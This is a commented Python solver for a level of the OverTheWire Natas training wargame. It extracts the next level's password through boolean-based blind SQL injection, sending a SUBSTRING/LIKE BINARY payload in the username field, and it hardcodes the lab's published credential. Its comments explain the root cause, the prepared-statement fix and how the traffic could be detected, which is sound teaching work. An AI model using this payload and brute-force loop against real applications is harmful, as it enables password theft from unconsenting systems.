import requests
import string

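# Solver for the OverTheWire "Natas" training wargame, level 15 -> 16.
#
# The level's username check answers "user exists" or not, and the value sent
# in the `username` field ends up inside the SQL the server runs (inferred from
# the payload below). That yes/no answer is a one-bit oracle: each request asks
# whether character i of natas16's password equals c. This is boolean-based
# blind SQL injection.
#
# Defender's view:
#   * Root cause is user input concatenated into a query. Bound parameters /
#     prepared statements on the server remove the oracle entirely.
#   * The traffic is noisy: up to len(alphabet) near-identical POSTs per
#     recovered character, each differing by one byte and containing SQL
#     keywords and a quote in a form field. Request-rate and
#     parameter-content rules in access logs or a WAF can flag this pattern.

# NOTE(review): lab credential published as part of the wargame. Outside a
# training lab, credentials belong in the environment or a secret store, not in
# source. The URL is plain http, so HTTP Basic auth travels unencrypted.
auth = ("natas15", "m2azll7JH6HS8Ay3SOjG3AGGlDGTJSTV")
url = "http://natas15.natas.labs.overthewire.org/index.php"

# requests.session() accepts no keyword arguments in current releases of
# requests, so the original `requests.session(auth=auth)` raises TypeError.
# Setting the credentials on the Session covers every request made through it,
# which also makes the per-request auth= argument unnecessary.
sess = requests.Session()
sess.auth = auth
data = {}
alphabet = string.ascii_letters + string.digits

# %d = 1-based character position, %s = candidate character.
# LIKE BINARY makes the comparison case-sensitive (the alphabet has both
# cases); the trailing '#' comments out whatever follows in the server's query.
query = 'natas16" AND SUBSTRING(password, %d, 1) LIKE BINARY "%s" #'
password = ""

# 69 is only an upper bound on the length: the loop stops at the first position
# where no candidate matches (for/else below).
for i in range(1, 70):
    for c in alphabet:
        data["username"] = query % (i, c)
        resp = sess.post(url, data=data, timeout=30)
        # Without this, a 401/5xx page simply lacks the marker text and is
        # read as "no match", ending the run early with a truncated result.
        resp.raise_for_status()
        # .text (decoded) rather than .content (bytes), so the substring test
        # is valid on both Python 2 and Python 3.
        r = resp.text
        if "user exists" in r:
            password += c
            # Single-argument print(...) gives identical output on Python 2
            # and Python 3.
            print("Current pass: " + password)
            break
    else:
        # No candidate matched at position i: past the end of the password.
        break

print("\nDone")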
